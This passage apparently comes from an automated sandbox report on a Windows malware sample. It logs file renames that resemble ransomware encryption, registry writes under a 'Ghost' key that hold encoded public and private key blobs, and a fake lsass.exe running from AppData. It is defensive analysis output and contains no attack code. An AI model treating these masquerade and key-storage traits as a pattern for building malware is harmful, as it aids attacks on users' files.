| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105348.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105360.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105368.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105376.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105378.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105380.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105384.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105386.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105388.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105390.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105396.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105398.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105410.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105412.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105414.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105490.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105496.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105502.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105504.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105506.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105520.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105526.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105530.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105588.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105600.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105638.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105710.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105846.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105912.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105974.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106020.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106124.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106208.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106222.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106572.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106816.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0106958.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107024.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107026.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107042.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107090.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107130.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107132.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107134.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107138.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107148.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107150.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107152.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107154.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107158.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107182.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107188.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107192.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107254.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107258.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107262.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0107264.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Move | C:\588bce7c90097ed212\1029\eula.rtf.B3195CE3-F37D-5752-8AB0-F23AD89717A2 | source_filename = C:\588bce7c90097ed212\1029\eula.rtf |
|
1 | |
| Write | C:\588bce7c90097ed212\1029\eula.rtf | size = 1 |
|
2 | |
|
For performance reasons, the remaining 3004 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (5392)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Ghost\Service | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost\Service | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
109 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
419 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
108 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
128 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
13 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
51 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
143 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
758 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
223 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
9 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
638 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
116 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Knock, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
419 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
108 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
128 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
13 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
51 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
143 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
758 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
223 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
9 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
638 | |
| Read Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Stop, type = REG_NONE |
|
116 | |
| Write Value | HKEY_CURRENT_USER\Software\Ghost\Service | value_name = Public, data = 0jibhM5NC7Ldv64I9ACxsEY5Gm0FlOczhG1Z319m+jrZchvKt224KKyqOKdYsWRZJqSOMbcchh2DRmyBrJ4g7SZwVlPkR/cK1d+j11LbPr/D0G9yD1f8jf+LomF39Ry2/5Af204C16Va2s68iD51srpHXHtlwpI7xh+QuSofqlmhnpThEBHls03+ZUEW1zQWLMAxDJc4Ew1RXJLFrhUXwlOEiYQ6NuuZst3aFzjQWijnBRmhsz1Nw3sobXfK/VLSTG2nDQ9n0yX2Ovubco/gL7/9vsyht9IX9YdU4b7cvouIRry1vzkPEZxRC+yBAyd0lcLaG0wVhFh5WizB8I9NEIgaozoSnTqZ7PFmwwP70XNkivBi0Fa9V+ymn6wDd4z608meebsG1braZnDp6Br1Cg==, size = 409, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Ghost\Service | value_name = Private, data = x6XGG/wUULYeoMP0DUWbXeP4sdBsl+hX5yHgzfhDF+1Byza0DTKPMumor8C77R3dAWq9V9JYe6Ha2fdIGNXfllfoAvTtYR7b4AHiS6pLDM/x2+cuBXJ/VPHm+qzOg/A2IBOVhV/ETa73DbrijOSovXRGNvqMNn3nZhSr7vDRgLVSap0pZTdzmG44bbuOl7fALjUSqIE1LzZNZgtBy4931bMM1pkGGDdaMFLgnNpUrr5QlHKbZR/HdY0bOR7yj/IACb6atZa3bqSXaEwKiKnmV0R1VimQY5j8t8jqwpD+msfnjZN8MZjFA0NNKMCgsAuF1aw7LTL+Ws+LVbBhr+CDcEfLWMNI551XYJdU8rkXVieDS/N0l/iNRXcj0k6AIusUOBri7WEHzq2QvOXUA6zBiCKrfCsymlFYSqdcQe1+EwsQpaGgNPLoDBsgyaEEN4dc07SHsHwWiuZdhE/15u/QAuk48pPR8yVOP1wf+hubTLGt0kR84AyCDVZFZhELMTip4RUTfKa8DZLY+GIgFfpS7ARwbqEJXKKLM6h1OQ+VDvQZMZ56zKxLfxEeopovlRsBsdqKOWGDydUIir7WLyE5z8ulkDQsCbnWH1+KJi4Q9pv2CMAOozsuF6GKLEZ7e4NxbbqTRBtUyqasi5hkZzMd/9KQqRVH/pMqU3BlSLwcuem1jlMS8FvFAMYbGZ7F/iXz2CcJUI23AaUwuZ4jt9EmA34s9XL0sRBbjx6GFoKHBfx+z2UvIV5akUWATIFHQSOK/HkLQKUGCshuMTPcwqNsoYIod3gHyr7Ehf5IsT3BSsZ5RsF0petLdUDMQXC2aSFSTuv9ana9zaU3teom5auklpLbe0r3gMnQ3f4B+sVkR0aw0QB7WneZTiqlGGlHXzTYWj3k19L9td4wQQ/r2WksDSf7xZN6rqLvoeV/jiI9+foZy5Y461wMbdCpFOCvrQ3tz6qwZuOntTjuuBcYpxanCv92j1yA+tCJsExtpbNsAFdj5Ub3w5mpefl9U6QPQwXiVv4EksvijAXC2XbIJtHEgAV2wqklO4VP+3IKW2bmuh0+MgmEnWZ2cxNsCr1ecQZp5N5JiW6+oBXrlka/SHbCovtQ7pAST04hQTB6laZ6hIdwuZzcnrjmt1jfASqDG//6uZWr3XsUXQtbPu3x2I0No5jthHtmyRXwx2NNasqa9/SgehOGOZRpvO7LX3Xqd+Xy25N8mMuf3IPUeDSWcdyVdf8C/Xz7TZHPhLxpoyq4XbxtozAXaOB0qfRTIgoIQyzhrDWr5pMH8N9shl95yk2UbKQmZD7u2zOKMv32RMEkGT8xeYhtcCepMUFT8/xpsdefVBVy/60fPzpudjJF9bXX6Ko7FhFpZmCRsSxITjQMOuj/4n8E0rkqPJGR7BVv6Z/LPU1yLktyzJV9htxIj+zFmx+WGbhXMKQI+oFBLBFJSJ2R0FeXYq0HGw5p9iZA7/V93Q3JrOsujfahic2cTxLnwQcBE6U/7SXldAqn/vVOczS7SenAVUjNF6LHgRQcP3k5y0sUw+agHik7iNXgXm+rVRuDAJCGvGQ5B9OMvTQApoAYZYyuxb5tZXDVFCEh5EN/6OJ1/8IhvVrp1VDMfbEJzI/pd8D4e3EBiKf1w4rUmiZE1doRwBPctc3zYV8OtpuseMyljddTePvNp4nBBNR8BPV97eg77Lx6JjCUdqePXqxk1tz1R8hBh+fV8gFXxyA08NPBjw==, size = 1737, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Ghost | value_name = Knock, data = 666, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (261)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | oleaut32.dll | base_address = 0x75bb0000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x761b0000 |
|
2 | |
| Load | user32.dll | base_address = 0x74b70000 |
|
2 | |
| Load | kernel32.dll | base_address = 0x75e90000 |
|
4 | |
| Load | mpr.dll | base_address = 0x744d0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76480000 |
|
3 | |
| Load | wininet.dll | base_address = 0x73e80000 |
|
1 | |
| Load | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.EN | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
29 | |
| Get Handle | c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75bb0000 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 260 |
|
1 | |
| Get Filename | c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe | process_name = c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.EN | process_name = c:\users\fd1hvy\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
9 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
17 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysFreeString, address_out = 0x75bcb920 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysReAllocStringLen, address_out = 0x75bd1500 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysAllocStringLen, address_out = 0x75bcb7e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x761cf020 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x761cf210 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardType, address_out = 0x74be8d80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DestroyWindow, address_out = 0x74ba3160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadStringA, address_out = 0x74b8d7b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x74bdd740 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharNextA, address_out = 0x74b8bf60 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75ea69d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75ea6970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x75efdd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedDecrement, address_out = 0x75ea73c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedIncrement, address_out = 0x75ea7420 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x75ea6a70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75ea6c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpynA, address_out = 0x75ea6c10 |
|
1 | |
